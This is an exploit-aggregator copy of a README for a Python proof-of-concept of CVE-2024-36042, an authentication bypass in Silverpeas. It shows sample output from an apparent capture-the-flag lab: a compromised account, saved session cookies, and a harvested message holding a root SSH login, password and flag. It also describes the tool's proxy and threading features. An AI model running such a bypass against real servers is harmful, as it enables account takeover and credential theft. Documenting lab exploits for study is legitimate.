## https://sploitus.com/exploit?id=6372CB47-3394-5E87-B077-64E64CAC05F3
# Silverpeas-AuthBypass-CVE-2024-36042
> A clean, single-file Python3 proof-of-concept for **CVE-2024-36042** โ an authentication bypass in Silverpeas scr1ptkiddy
[+] Cookies -> ./cookies_scr1ptkiddy.txt
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Messages for scr1ptkiddy
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Message ID: 3 | Title: RE: Server Access
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
From: SilverAdmin
ssh root@10.48.148.27
password: SuperSecret123!
flag: THM{silverpeas_bypass_confirmed}
[+] Found 1 message(s)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Summary โ 1 account(s) compromised
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ scr1ptkiddy
[+] JSON report -> ./report_20260515_210500.json
[+] CSV export -> ./messages_20260515_210500.csv
```
---
## Why This Exists
This repository is part of my offensive-security portfolio. It demonstrates:
- **Vulnerability Research Translation** โ converting a disclosed CVE into a working, reliable exploit
- **Clean Tooling** โ typed Python, modular design, CLI ergonomics, and structured output
- **Operational Awareness** โ proxy support, threading, quiet mode, and export formats that fit real workflows
- **Responsible Disclosure Mindset** โ version detection and `--no-exploit` flag to assess scope before action
---
## Disclaimer
This tool is provided for **authorized security testing, research, and educational purposes only**. Unauthorized access to computer systems is illegal. Always obtain explicit permission before testing any infrastructure you do not own.
---
## License
MIT